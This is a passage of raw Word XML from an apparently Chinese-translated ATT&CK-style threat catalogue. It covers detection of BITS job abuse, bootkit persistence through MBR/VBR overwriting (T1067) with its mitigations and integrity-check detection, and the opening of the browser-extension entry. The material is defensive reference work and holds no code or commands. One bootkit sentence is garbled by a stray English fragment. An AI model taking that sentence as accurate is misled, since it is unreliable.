        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetCustomHeaders</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Resume</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令选项）的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>事件日志来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动。还要考虑通过解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业数据库来调查作业相关的更多详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC623A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的网络活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BITS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行远程连接，仅限于创建用户，并且仅在该用户登录时才起作用（即使用户将作业附加到服务账号，此规则也适用）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51CB1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Bootkit</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="693988A8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE988B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1067</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092E165E" w14:textId="4F9C022C" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
              </w:rPr>
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481CD7BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158D1AFF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="615157FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005856F9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="005856F9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="005856F9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MBR</w:t>
            </w:r>
            <w:r w:rsidRPr="005856F9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="005856F9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VBR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A97D53" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="555555"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F3C7503" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D61E815" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BootKit</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是一种恶意软件变体，用于修改硬盘驱动器的引导扇区，包括主引导记录（</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）和卷引导记录（</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VBR</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20112800" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>bootkits</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在操作系统下的某一层系统上持久化，这可能会使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全修复</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变得困难，除非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25393">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25393">
        <w:t>organization suspects one</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25393">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25393">
        <w:t>能正确的运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D384E95" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主引导记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B8805" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成硬件初始化之后首先加载的磁盘部分。它是引导加载程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置。对引导驱动器具有原始访问权限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重写</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此区域，从而在启动期间将执行从正常引导加载程序转移到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DCBC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卷引导记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F98B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将引导进程的控制权传递给</w:t>
      </w:r>
      <w:r>
        <w:t>VBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。与</w:t>
      </w:r>
      <w:r>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况类似，对引导驱动器具有原始访问权限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>VBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以便在启动期间将执行转移到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00951A35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A17A66" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2118"/>
        <w:gridCol w:w="7618"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="1584FF4F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2AE14218" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1EB15E8D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="008C24DE" w14:paraId="36003D91" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A433EBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>引导完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CAFAB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用受信任的平台模块技术和安全可信的引导过程以防止系统完整性受到损害。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="008C24DE" w14:paraId="7D1F522B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4246BD11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账户</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED00367" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008C24DE" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>特权账户都拥有合适的权限，来</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止获取了</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>特权</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账户</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>的攻击者安装</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>bootkit</w:t>
            </w:r>
            <w:r w:rsidRPr="008C24DE">
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A02DF6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D101766" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行完整性检查。拍摄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的快照，并与已知的好样本进行比较。当</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0084569C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现可疑行为</w:t>
      </w:r>
      <w:r>
        <w:t>与进一步分析指标时，记录他们的变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E8683" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="304FCE16" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E5B1CFE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1176</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4874081A" w14:textId="00227907" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
